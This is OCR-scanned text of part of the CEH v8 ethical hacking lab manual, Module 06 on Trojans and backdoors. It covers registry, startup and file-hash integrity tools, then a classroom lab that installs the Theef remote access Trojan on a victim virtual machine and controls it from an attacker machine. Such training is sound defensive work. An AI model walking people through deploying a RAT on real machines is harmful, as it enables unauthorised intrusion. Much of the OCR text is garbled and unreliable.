R e g istry ju n k ‫ח‬ O b so le te s o ftw a re e ntry 30% 30% 30% 30%

HKCUVSoftw HKCU^oftw HKUS\S-1-SHKUSV1-5-

(3 U se le ss e m pty ke y HKCRVaaot | HKCRVaaot HKCRVacrot MKCRV.aaot 10% 20% 20% 20%

Selected: 0, h ig h lig h te d : 0, tota l: 296

FIGURE 8.25: jvl6 Clean and fix my computer Item registry junk.

25. Select all check boxes 111 die item list and click Delete. A dialog box appears. Click Yes.

— L&S f c s l i l f i f l Page Empty Locations selection in die Options menu is checked Autoruns doesn't show locations with no entries

479

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

jv16 PowerTools 2012 [W8-x64] - Clean and fix my computer[
File Select Tools
Item Seventy Description Tags Item Seventy Descnption Tags

Help

0 J

jv16 PowerTools 2012

O
0

Y ou are a bo ut to delete a lo t o f erroneous registry data. Using th e Fix o p tio n is always th e better o p tio n . Are y o u sure y o u kn o w w h a t yo u are d o in g and w a n t to proceed?

*I S la il m enu a n d d e s k to p item s

23/23

S e le c te d j2 9 ^ h ig h lig h te d ftto ta h 2 9 6

FIGURE 8.26: jvl6 Clean and fix my compute! Item check box.

26. Go to the Home tab, and click die Control which programs start automatically icon.

C E H L ab M a n u al P age 480

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

UJ The Verify Signatures option appears in the Options menu on systems that support image signing verification and can result in Autoruns querying certificate revocation list (CRL) web sites to determine if image signatures are valid

M od ule 0 6 - T rojans and Backdoors

FIGURE 8.28: jvl6 Control which program start automatically.

27. Check programs in Startup manager, and then you can select die appropriate action.
jv16 PowerTools 2012 [W8-x64] - Startup Manager
File Select Tools Help Process running Yes PID Threads Base priority Memory usage File size 4280 4 Normal 9.12 MB 246.92 KB )usched.exe C: program Files (x86)VCommon 1 rt<EY_LOCAL,MACHINE \SOFTVV< JavaCTM) Update SchecUer
‫־‬

T Z S

Enabled System entry No Program Filename Loaded from Descrption Tags Enabled / Program Descrption

C! The Hide Microsoft Entries selection omits images that have been signed by Microsoft if Verify Signatures is selected and omits images that have Microsoft in their resource's company name field if Verify Signatures is not selected

Command Ine 'C:\program FJes (x86)\Common

Page file usage 2.23 MB

Tags 10 —

|l 1 F o un d s o ftw a re

S I ‫מ׳‬

■ Yes □ □ □ □ □ □ □ Yes Yes Yes Yes Yes Yes Yes

)usched.exe googletalk.exe EMP_UO.exe Reader_sl.exe AdobeARM.exe 1gfxtray.exe hkcmd.exe 1gfxpers.exe

C:program Files C: program Files =

Google Talk

EPSON USB Dispk C:\Program Files Adobe Acrobat S| C:\program Files Adobe Reader ar1C: program Files igfxTray Module C:\Windowsteyst hkcmd Module C:\W indows^yst

persistence Modi. C:\Windowsfeyst

FIGURE 8.29: jvl6 Startup Manager Dialogue.

28. Click die Registry Tools menu to view registry icons.

i

f!
File

jv16 PowerTools 2012
Language Tools Help

I MACECRAFT >SOFTWARE

Trial Urnta bon n Effect - 60 days left

B3 Use the Hide Microsoft Entries or Hide Windows Entries in the Options menu to help you identify software that's been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that's trusted by the system

Live Support: Online

Handbook not avaiaWe

L

$
Registry Tools

m
Regstry Manager

49
Registry F^der Registry Information

m
Registry Find & Replace Registry Cleaner

System Tools

^

Privacy Tools

Regetry Compactor

j8>

Registry Monitor

Backups

Acton Hstory

IU I

Settings

100%
Registry Health

Trial Reminder
You are using the free trial version o f jv l6 PowerTools. Pick here to buy the real version'

FIGURE 8.30: jvl6 Registry tools.

29. Click File Tools to view hie icons.
C E H L ab M an u al P age 481 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

E E 1 The Hide Windows Entries omits images signed by Windows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries omits images that have Microsoft in their resource's company name field and the image resides beneath the %SystemRoot% directory

FIGURE 8.31: jvl6 File tools.

30. Click System Tools ro view system icons.
jv16 PowerTools 2012
Fite Language Tools Help

x
Live Support: Online Handbook not avaiaWe

I MACECRAFT
' SO FTW ARE

Trial Untatoon In Effect - 60 days left

L

Home

Registry Tools

Software Unnstaler

U E H
Startup Manager System Optimizer

Qj
Start Menu Tool Automation Tool

!I m■!

S ystem Tools

^

Privacy Tools

Service Manager

Backups

Action History

IQ I

Settings

100%
Registry Health

Trial Reminder
You are using the free trial version o f jv l6 PowerTools. Clioreal version! to buy the

& Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans
§ a < & d 9 fl» ‫־‬Page 482

FIGURE 8.32: jvl6 System tools.

E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

31. Click Privacy tools to view privacy icon.
jv16 PowerTools 2012
I E*e !,*"Quage 1001* Hdp

1MACECRAFT
' S O FT W A R E

Trial Lfnitabon in Effect - 60 days left

Live Support: Online

Handbook not avarfable

L

A

Registry Tools

history Oeaner

Disk Wiper

1^ ‫ ך‬Fie Tools

B

System Tools

Backups

Actjon Hstory

| L lj

Settings

3

Trial Reminder
You are usng the free trial version of jv 16 PowerTools. C kk here to buy the real version ‫י‬

FIGURE 8.33: jvl6 Privacy tools.

32. Click Backups in die menu to display die Backup Tool dialog box.
jv16 PowerTools 2012

T ^T eT x T

£Q You can compare the current Autoruns display with previous results that you've saved. S elect File|Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted item s

File

Language

loots

Help

O
£He

MACECRAFT
SO FTW ARE

Trial Umitabon in Effect - 60 days left

Live Support:

Handbook not

L
x

jv16 PowerTools 2012 [W8‫־‬x64] ‫ ־‬Backup Tool I ~ I
Select lo o k Help

1

Registry Backups Descnptjon

Fie Backups

Othef Backups Size ID Created

Type

0 13 File Backups □ Clean and Data removed 34.6 KB 00062D 21.09.2012,

R e Sejected^^iighliqhted^^otaM

FIGURE 8.34: jvl6 Backup took

C E H L ab M an u al P age 483

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

33. Go to Windows Server 2012 Virtual Machine.
= TASK 5

FsumFrontEnd

34. Double-click FsumFrontEnd.exe, the executable tile located at D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend. 35. The Fsum Frontend main window is shown 111 the following screenshot
Fsum Frontend v l .5.5.1
B - Q Fsum Frontend Tools □ ₪ B - Q Calculate hashe n

iz r^ * ‫׳‬
‫ח‬ n ap hash crc16_ccitt C bdkr H I crc16_ibm IZ crc32_br1p2 d dhoZ35 □ <rc16_125 d crc32jamcrc ( 7 e d o n k cy

ESS
M ethods (96) Q adlcr15 Q adler32 f ‫־‬l crc16 ‫ ח‬adlcrS ‫ח‬ cfcsum_mp€c2 Q crc8 □ crcl6_xr‫>־‬ ‫־‬dem □ crcl6_zmodem □ crcM i n c1c32_mpcg2 dF32 1 i crc.54 (_) fletcher8 O crc64_ecma Q fletcherl 6 □ crcJZ ( j djb hash Q . fletcher32

5E= : :
Tod 2 3 - : ■ ■ Verify checksur 3&■■: *G enerate chec Options 0 5 ! ‫•״״‬ About

C fn vO -2 2

L

f

n

1

/ ‫י‬

‫״‬0-64

Compare

H a th :
lS a .U a
Encoding: Bate 16 (hexadecimal)

C ?L og

Web sits htipi.'/fsum fesourcefoi

2 ‫״‬,

& CEH-Tools are also located mapped Network Drive (Z:) of Virtual Machines

FIGURE 8.35: FsumFrontEnd main window.

36. Select the type ot hash that you want; let’s say md5. Check die md5 check box.
Fsum Frontend v1.5.5.1
_ Fsum Frontend ■ j □ Tool* (_J haval224 (3) □ /w ch D pjw r32 0 sdbm 1 1 * 1 2 (5 1 2 ) Mash: F ie u b*val224 (4)

IH -I‫ ־‬C alc u la tehaiht & > *■
Tort
! 1 0 Verify checksur G enera!• ch*ce ; 8 8 O ptions 4 ‫י‬--‫ |־‬About

m . . ______. . . %

......... L h o v a l2 5 6 (3 ) C l «nd4 □ ripemd250 □ »ha2 (224) T 1snefm 2 128 (81 hava 1256(4) (✓ m d * .| C ripemd320 C >ha2 (256) r snefru2 256 W l_ h » v jl2 5 6 (5 ) □ pananui C ‫ מ‬hash C 3h«2 (384) r snefru22S6f8> v =

u

haval224 (5)

Q jihJK h n rip«m dl28

□ m dl T 1 rlpem dlftO D >h«1 f 1snc fru 2 128(41

f l shaO n si:c64

\m

^ C o

^ 0 a | UkQ

Encoding: | Base 16 (hexadecimal) v

□ hw ac

[<C

W eb titt http:.'/fsu r> » eto j‫«< ׳‬ror3 e n e ! I

C E H L ab M a n u al P age 484

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

FIGURE 8.36: FsumFrontEnd checking md5.

37. Select a tile by clicking die File browse bottom from die desktop. That is Test.txt.
Fsum Frontcnd v1.5.5.1
Fsum Frortend Q Tools □ M ethods ( 1 /9 6 ) □ haval224 (J) □ /hash □ p j"32 □ hava!224 (4) □ jsh a sh □ ripcmd128 (~1 shaO (- I (17664 □ h aval224 (S) □ m d? G ripemdl&O Q shal IH snefru2 128(4) C h a v a l2 5 6 (3 ) G m d4 E " 1ipemd256 □ sha2 (224) I 1snefru2 128 (8) | hava!2S6 (4) Q ] hav3 2S0 (5) □ p M w r? I is hash L2 Calculate - 0 ‫ »ר‬11 ‫א‬

Q Have Autoruns automatically execu te an Internet search in your browser by selecting Search Online in the Entry menu

j-c5 He

:

B m d5 E " ripcm d320 Q sha2 (256) I

S 3 Verify chccksur ■ •: G eaerare check gH O ptions J? | A bout : ■

risdbm
n « k a 2 CS12I Hash: F ie |

□ sha2(3&4) snefru2 256 (1

snefru2 256 14) I

=3 B ,

Encoding: |Base 16 [hexadecimal) v j O HMAC

W log

W ebsite h ttp r.'/fium fesoircerorge-ne:

FIGURE 8.37: FsumFrontEnd file browse.

& Autoruns displays the text "(Not verified)" next to the company name of an image that either d oes not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system

B--EZ Fsum Ficntcnd a - S Tools : b-Z H Calculate hashes ;-•G3 Fie :- 2 3 T ec j Q V »rifychK h 1 AJ Generate ch«<

□ Methods :96( ‫ ח‬idler? D ( b u 1 r .m p c g 2 H ladlerl6 [H «c8 □ adler32 □ crc16 n ap hash □ ac16_ccitt |‫ |־־‬bdlcr ‫ ח‬crc15_ibm □ ac15_x25

0 © '•
Orgenirc ’ ■ Desktop Nev» folder

:1 ‫נ‬

J| Downleads
Recent places

ASK

Computer Folder Network System Folder MotiIIj Firefox Shortcut 1.06 KB Google Chiomc Shortcut 2.il KB Test Text Document

Ito a rits 3 Documents

J 1 M udr Pictures 3 Videos

fe
<r
Filename: Test

flP Computer Local D«fc (C.)

1— a Lccel Disk D)
a Local Disk [&)

0 byte*
| a !I Files r . ‫־‬T

3

Website. http:Vfsumfc.50u ccfcrgc.‫* ׳‬ct

FIGURE 8.38: Fsum Front End file open.

38. Click Add Folder to select a folder to be added to die hash, for example, D:\CEH-Tools

C E H L ab M an u al P age 485

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Fsum frontend v1.5.5.1
B --IS Fsum Frontend i) □ Tools | i ‫ח‬ M ethods a / 95: [ J h«val224 (4) Q J‫ ז‬hJKh n r i p « m d l2 8 □»haO ‫ח‬ si:c€4 U h av a l2 2 4 (5 ) □ m dS M rlp e m d lftO □>hd1 1 1 snc fru 2 123 (4) U haval258 (3) L P ripemd256 □ »ha2 (224) I snefw 2 128 (81 L havat25&(4) E ‫^ *ייי‬ □ ripem d320 C sh a 2 (2 S 6 )

— I‫ם‬

x

1- 1 ■ I

Calculate hasht ( J haval224 (J) ‫־‬ J “ ‫׳‬ !•••^Tort 3 H ‫ ח‬pj*32 □ »dbm 1 ska2 (512) C h « v a l2 5 8 (5 ) L p a ru rra C ish a sh ( I 384) 2««‫)נ‬ v

K Verify checksur j k Generate check ! 8 ij O ptions About

V snefru2 258 (41 T snef 1u 2 258 f8>

Cow pare Hash: F ie ^ l)ACEH-T0cls\CEHv3 M odule 06 Trojans a nd BackdoorsNFiles and Folder Integrity C h e d teiV sum frontend1.5‫ _ |־‬. |_ 0 1 Encoding: |G ase 16 (hcxadcdmal) v|

Qj HMAC

G f lAutoiuns prefixes the
name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for die file that's trusted by the system

File

< 1t e
L o JV

=

W ebcit• http:7f1um fe to arc afo rg e .n et 1

FIGURE 8.39: FsumFrontEnd Add Folder.
Fsum Frontend v1.5.5.1 Fsum ficntend H-b2 Tools I B -t3 Cakuiatehashes ‫ |"־‬kMhwfe (1/ 96‫! ׳‬ | ghj!h3 L 9^-‫נר^ז׳‬ _JhMl160(3) Q_hBv9il60(j} □ hav?C24 (4) Q tav*224 (5)

j I i d«t
j I

23T ea

LI 9*‫ז*י‬ □ havall 60 (5)
□ hav8B56G) 5jm d5 □ rshash

L lh a ilfiO
□ hava!192(3)

U havelVA (3)
□ h«v«l192 (A ) □ hav8l256 (5)

|_| Koval128 (4)
□ havaH92[S) Qjhash □ ripemd128 [ !dial

I_ h « v « n 2 a c 5 )
Ch«r11224{3J

: H i Verify checksum (4es Q m d2 •- £ Gen& ilt checksum fi □ rip«fnd256 :••05 Options

Cm u
C! fipemdSZQ

D h a v a l2 5 6 (4 )
□ panama [I!sdbm

□p jw 3 2 □s h a O ‫־‬H

Cjsh* h

5

C ripemd160

C shi22 2 4 )

H a sh
File

Browse For Folder

Dt\CB4-T00IACE

C h e c k e rS fs u m fro n te nd -1.5 .5 .1 '‫ז‬c a d rn t•jC

1 ‫־‬-i “• ‫*“יי״‬
A

t• A Adm inistrator
Computer
t f a Local Disk (CO

« lD is k< D )

iL
I | CW«I 1

£3 A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system

iL .___ — —

FIGURE 8.40: FsumFrontEnd Adding Folder.

39. Respective tiles o f die selected folder will be listed 111 a list box.

C E H L ab M a n u al P age 486

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

II 14■ _2 Ftum fk■>t«nd a U ‫ ד‬ooi 1 : m t J CakulatohMhtt i : T«! (9J V»1f, checksum 14c. : G«n«r«'.t c^*Jaum fi cJJ Options About

Fsum From end v l .5.5.1 □ Maihodb < 1 / 96( □ h*aH600> □ Krv»LL4 (4) f~~l tm&? Q ry « n d 2 * rf*?(25« Hath: File ■ _ y [ »wvaM60(4} (‫•** ־‬vrfiMlS) ( kmM L npem dlM 1 4»?(164> [ |haval1G0(3) ‫|־־‬hav.l2S6<3) v jaid) Q n h i* l*a?(S12) [ Ih^al192 (3) D H«v«l2S6 (4) panama [ju lb m f wr(W C hav.1152 (4) □hav.l2S6<S) 0 pJwS2 1 |h«vaU92(5) r ) |h » h | |np*mdl28

‫ ז‬- ! u H

|

I havaC24Q) ~ |» K « h r 1pr<nd160

Q1b»0 [_| ‫י*ייי‬ Q tlu2(2M | ‫ ח‬mefru2128(41 I I1nefru2 128(8) »«rffu? 2%W

Dt\CB4-Too(>'CEH. 3 Module 06 T1cyans and BackdooisSFiles and Folder Integrity Checke\fsorrtfrontend•1.S.S.1Vftadme xa j a

.

:3 Fi ‫■׳‬ *

f i LJ

Encoding: Base 16 (hexadecimal)

v]

(~HMAC

Fie ^ D:\CrM-IochvThun1tM-db (P0\C Bt-T M lA CB t4 Lab Prere— 0■ D ‫־‬ .'.CB+T0c!s\CEH/8 Lab Prere® D :\aH -T 0cl5\CEH-e lab Prerc0 ‫ ז‬oc(s\CEH/S Lab Prere_ £3 t>\CFH-TocisxCEH/S lab Prere_ j i j D:\CH4-Tocte\C£!-(•<€ Lab Prere_ S t D\CEH‫־‬Tocb\Cil‫־‬fv6 Lab Prere_ 4J0.\CEH-Toob‫׳‬vCB+^ Lab Prere_ ^D'.CTH-TochSCEH<€ lab Prert— ‫ ן‬- j[>\C£H-TochvClHv6 lab Prere_

<| Log

111

| >

-

Wrr \1le Mlpy/ltumfe 1c.‫׳‬.rfc«1jr

FIGURE 8.41: FsumFiontEnd files list.

40. Click Generate checksum files. The progress bar shows the progress percentage complete for the hash tiles generated.
Fsum Frortend v1.5.5.1
Fium Fiontend a LZ Tools : H 1 Cakuiatehashes ‫ ה‬Mrihodk (1 96 ‫)׳‬

]h*al160G)

[ te,*160:4}
[‫ ־־‬havtim (5)

I j 23‫־‬

Ted II (‫| ־‬K^^t224«4» I fep Verify checksum 14es - 11» U : £ Generate checksum f! _]np«m«£i6 Options 14a? (256) About Hash | File

□ havall 60 (5) □ h‫״‬v.l2S6(3)

r ‫«״‬
I npemdl2£ ]

3• n d S Q reh sd i

H]haval192 )5( )H haval2S6 )4(

r !-‫״‬-‫*״‬.
! ‫ * ־‬dbm

I *»2GS4)

‫ * ח‬02 )512(

r lsoc6»

□p jw * 2 Q * h » 0

□ hav*1192 (4) □ hav«l2S6 (S)

C]haval192 [5) I |npemd128

□ K* 41224 31

0 * ‫»י‬ * ‫י‬
^ nprmdlfcO [!***2C224J ?nrfru2 256fi

U * •“1

5ncfru2128f41 I Isnefru2 128 (8)

D:\CEH-Tools'C EH.3 f.lcdu e 06Trcjans ard Backdcois'sRIes and Folder Integrity CheckeAfsumfrontend-'.5.5.lMtadme‫־‬£ > 13 F | | E£j y Encoding: Base 16 (hexadecimal) ~v] □HMAC

Q Autoruns will display a dialog with a button that enables you to re• launch Autoruns with administrative rights

Fie th\CB‫־‬MocHvThum*>vdb (SPD.CtM-Tooh\CtH^ Lab Prere0■ D ‫‘־‬.CEHT0cls\CEH/S Lab Prert_ O D:\CtH-TooH\CtHve Lab PrgrgB 0 ‫־‬.aH -IooH \CIH 4 Lab Pr«‫׳‬f_ ^ 0:\CfH.Too»5 SCfHv« lab Prert_ D\CIH IeeWvC(M/fl lab Prcrc‫״‬ E 0 .\C lH -Ieo<i\CIH4 Lab P‫׳‬v«~ #)DACB4 Toob\C&+‫ «״‬Lab Prtrt^ D '.CfH Tooh\CfH*« lab Prcrr|4J D\CtM- 10eh\CIHw6 lab Pr*r»...

FIGURE 8.42: FsumFiontEnd Generate checksum files.

C E H L ab M a n u al P age 487

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Fsum Frontend * 27% Ir Ku‫׳‬n fantcnd a •1 . Too•* W C«kul4l*hMh«1 1 N ■ ‫״‬ ‫ ־‬iMalhodbtWKt ltw H 6O 0) 4)224) • ^ ‫) ר‬ ~ }m d / □ S* I twval1«>(4) r *W V4224 IS) r [ _ 1*pemdl« shM? 064) lhavaH60(5) 1 ‫ ־‬h«v#l2 St><J> _J«h‫ ״‬h l*w?(S1?) r W fis [ h*‫׳‬aM92(J) r |4) [ im iw m im □ h«v«H92 (4) □ h.v.l 2S6 (S) □ ihnO Wffru212«(41 |h«val1M fS) n !h « h — |nprmdl28 |«h*1 Iinf#ru2 1?8 (8)

‫ם‬ 1 X J

I I

; (9.J Vwif, Lhw.Uun.t4c, ‫׳‬-•j j 6«nwj : «th*ckium 1i ;••cli Option* :. . j 3 About

h*r«B24 31 ‫״‬J il h « h liprm dlM W#ru22 K M

File

Cv La .V .

&‫׳‬. y.. ,.CtsktopvTtst.UX Encoding: Ba.e 16 <hewdicim.il) v □ hmac |

O You can also use the -e command-line option to launch initially launch Autoruns with administrative rights
< j - , Log Re mdS: 1 Extcuton: Rc II <1

File D:\CEM-1oc :1 vThuubvdb I^D.CfcH-ToctsvCEH/* Lab PrtfS■ D:\CB+Toc!s\CB+<e Lab PrereSH ttO H -T 0c»5\CEH*labPrerc_ 5 3 D'.CfcH-1octs\C£H/S Lib Preffc_ 3 DACEH-Toc*s\C&+/* Lab Prcre_ j i , D:\CB4-Tock\C£R.« Lab Prrrr_ D:\CEH-Toc(s\C£Hv6 L«b Prere— £)DA<B4-T oo&C B*« Lab Prere^I>\CFH-Toc^CFH-eHbPrerc_

‫׳‬nd5 B16B0289... C482F590‫״‬ 4C029WFJ40E83IC‫״‬ 007C8321D22FF2CC... 3B85A96A... C783050E7A7741C269A3S127BA6FMA7 | E 8ECEDSA... 08*2202-

C:'U»*S\Admin««rjw<\0 «ktop\Testt«t D41DeCDS»0CKGa13®09OGICFW2r£ (X kO C fcO O C O I ft'CEH-Too•?‘Thunb^. db

1p, ‫׳‬llurri'f lOU'tffcXgF

FIGURE 8.43: FsumFrontEnd progress of hash files.

41. The following is die list o f 111d5 tiles after completion.

& CEH-Tools are also located mapped Network Drive (Z:) of Virtual Machines

FIGURE 8.44: FsumFrontEnd list of hash files.

Lab Analysis
Analyze and document the results related to die lab exercise. Give vour opinion on your target’s security posture and exposure dirough public and free information.

C E H L ab M an u al P age 488

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

1

M odule 0 6 - T rojans and Backdoors

P L E A S E TALK TO YOUR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S R E L A T E D T O T H I S LAB.

Questions
1. Scenario: Alice wants to use TCP View to keep an eye 011 external connections. However, sometimes there are large numbers o f connections with a Remote Address o f "localliost:####". These entnes do not tell Alice anything o f interest, and the large quantity of entnes caused useful entries to be pushed out of view. 2. Is there any way to filter out the "localliost:####" Remote Address entries? Evaluate what are the other details displayed by “autoruns” and analyze the working of autonuis tool. Evaluate the other options o f Jv l6 Power Tool and analyze the result. Evaluate and list die algonduns diat FsumFrontEnd supports.

3.

4. 5.

In tern e t C o n n ectio n R eq u ired □ Yes 0 No

P latform S up p o rted 0 C lassroom 0 iLabs

C E H L ab M an u al P age 489

E tliical H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M odule 0 6 - T rojans and Backdoors

Creating a Server Using the Theef
Tbeef is a Windon•s-based applicationfor both the client and server end. The Theef server is a vims that yon install onyonr victim's computer, and the Thef client in nhatyou then use to control the vims.
ICON KEY

Lab Scenario
A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-ofservice (DDoS) attacks, 01‫ ־‬it may be used to install additional Trojans or other forms o f malicious software. For example, a backdoor Trojan may be used to install a downloader 01‫ ־‬dropper Trojan, which may 111 turn install a proxy Trojan used to relay spam or a keylogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports 011 the affected system and thus potentially lead to further compromise by other attackers. You are a security administrator o f your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, stealing valuable data from the network, and identity theft.

/' Valuable information
S

Test your
k n o w led g e_______

*

Web exercise

£Q! Workbook review

Lab Objectives
The objective o f tins lab is to help students learn to detect Trojan and backdoor attacks.
JT Tools The objectives o f the lab niclude: demonstrated in ■ Creating a server and testing the network for attack this lab are available in ■ Detecting Trojans and backdoors D:\CEHTools\CEHv8 ■ Attacking a network usmg sample Trojans and documenting all Module 06 Trojans vulnerabilities and flaws detected and Backdoors

Lab Environment
To carry tins out, you need:
■ T heef tool located at D:\CEH-T00 ls\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Rem ote A c c e s s Trojans (RAT)\Theef

C E H L ab M an u al P age 490

E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

■ ■

A computer running Windows Server 2012 as host machine A computer running Window Server 8 Virtual Machine (Attacker)
Windows Server 2008 mnning 111 Virtual Machine (Victim)

■ ■

A web browser with Internet access Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains m alicious or harmful code inside apparently harmless programming or data 111 such a way that it can get control and cause damage, such as mining die file allocation table on a hard drive.
Note: The versions of die created client or host and appearance o f die website may differ from what it is 111 die lab, but die actual process of creating the server and die client is same as shown 111 diis lab.

Lab Tasks
M TASK 1

Create Server with Pro Rat

1. Launch Windows Server 2008 Virtual Machine and navigate to Z:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote A ccess Trojans (RAT)\Theef. 2. Double-click Server2 10 .exe to run die Trojan on the victim’s machine.
jija
* T‫׳‬ojans T /oes » denote Ac:e5s ‫ ־‬roiars (RAT) » Theef

L °‫*ז‬°
I » I Date modi-ied I 0 . COOararr.n I - I Type M Sire H

‫י‬
I j

C tontt1 0 .* * •
Edacrvcr pass s readn-e.txt

2 1 0

e>e

ciders
JA
^

1 !■3upx.exe Cemnond Shell ~rw * I ^

v P|B9B9EBB

Defacenent 'ro ja rs D estruave T'coans E-Mal T‫׳‬ojans F P T ro ja r GUI Trojans

| . Ebanang Trojans

Ji
£

i-rrTFH‫־‬TPS‫ ־‬r )ars i t ICMP Bcddoor ^ MAC OS X Trojans ^ Proxy Ser\er Trojan: Remote Access “rtge Apocalypse ^ ^ k). DarkCorretRAT ProRst Theef Atelie‫ ׳‬web Rem

0

3 1
__

FIGURE 8.1: Windows Server 2008-Theef Folder

3. 111 the Open File - Security Warning window, click Run, as shown in die following screenshot.

C E H L ab M an u al P age 491

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

M od ule 0 6 - T rojans and Backdoors

Open File - Security Warning The publisher could not be verified run this software? Are you sure you want to

I]

Name Publisher Type
From

...emote Access Trojans (RAT)\Theef\Server210.exe Unknown Publisher Application Z:\CEHv8 Module 06Trojans and Backdoors\Trojan... Run Cancel

't

This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust. How can I decide what software to run ‫ל‬

FIGURE 8.2: Windows Server 2008-Secuiity Warning

4. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote A ccess Trojans (RAT)\Theef. 5. Double-click Client210.exe to access the victim macliine remotely.

|P . qTT” 1 | ‫־‬ ‫־‬ « ‫־‬ & •
Home
Favorites ■ D esktop £ D ow nloads ^ R e ce n t places

A p p lic a to r took

Theef

Share

View

Manage v | (j | | Search Theef


fi |

‫ ״‬Trcjans Types ► Remote Access Trojans (RAT) ►Theef
£ | c c ip a ra - n .n i Cl c rt2 '0 .e x e

j

iflj Ec'1tser\er21 C.exe pcss.dll | rea d m e, tx: " ‫ «׳‬Scanner.dll

3 9 Libraries [ 1 D o cu m en ts J ' ‫ ׳‬M usic m |j P ictu re s Videos

Sever2IO .ex6

■ J upx.exe

<6 zip.dl

H o m e g ro u p

f f 1 C o m p u ter tim Local Disk (C:) V CEH Tools ( \\1 0.0.0.

N etw ork

9 items

1 item selected S22 KB

FIGURE 8.3: Windows 8-Running Client210.exe

6. 111 the Open File - Security Warning window, click Run. as shown 111 die following screenshot.

C E H L ab M an u al P age 492

E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

Open File - Security Warning
T h e p u b lis h e r c o u ld n o t b e v e r if ie d . A r e y o u s u re y o u w a n t t o r u n th is s o ftw a re ?

S3

Nam e: P u b lis h e r Type F ro m :

...p e s \R e m o te A ccess T ro ja n s (R A T )\T h e e f\C lie n t2 1 0 .e x e U n k n o w n P u b lis h e r A p p lic a tio n Z : \ C E H v 8 M o d u le 0 6 T r o ja n s a n d B ackd o orsN T ro ja ns T...

Run

C a nce l

T h is f ile d oe s n o t h a ve a v a lid d ig ita l s ig n a tu re th a t v e rifie s its p u b lis h e r. Y o u s h o u ld o n ly ru n s o ftw a re f r o m p u b lis h e rs y o u tru s t. H o w ca n I d e c id e w h a t s o ftw a re t o run?

FIGURE 8.4: Windows 8-Security Warning

7. The maui window o f Theef appears, as shown 111 die following screenshot.
‫ ׳‬n e e tv ^ iu Connect

1^

0‫־‬

■ > ‫׳‬

Port

6 703

FTP

2 968

Connect

Disconnect

A


FIGURE 8.5: Theef Main Screen

Th eef version 2.10 01/No‫׳‬.‫׳‬ember/2004

8. 9.

Enter an IP address 111 the IP held, and leave die Port and FTP tields as dieir defaults. 111 diis lab we are attacking W indows Server 2008 (10.0.0.13). Click C onnect after entering die IP address o f Windows Server 2008.

C E H L ab M an u al P age 493

E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

Module 06 - Trojans and Backdoors

T T 7Tieef v 2 10 Connect

Port

6 703

FTP

2 968

Connect

Disconnect

A
C omputer inform ation

FIGURE 8.6: Theef Connecting to Victim Machine

10. Now ill W indows 8 you have access to view the W indows Server 2008 machine remotely.
ro -h e e fv .2 .1 0

Connect

10.0.0.13

-

Port

6 703

FTP

2 968

Connect

Disconnect

[15:05:31] Attempting connection with 10.0.0.13 [15:05:31] Connection established with 10.0.0.13 [15:05:31] Connection accepted [15:05:31] Connected to tran sfer port

A

%

•Qj SY

&

Connected to server

FIGURE 8.7: Theef Gained access of Victim Machine

11. To view die computer information, click die Computer icon at die bottom of die window. 12. 111 Computer Information, you are able to view PC Details. OS Info, Home, and Network by clicking on die respective buttons.

C E H L ab M an u al P age 494

E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.

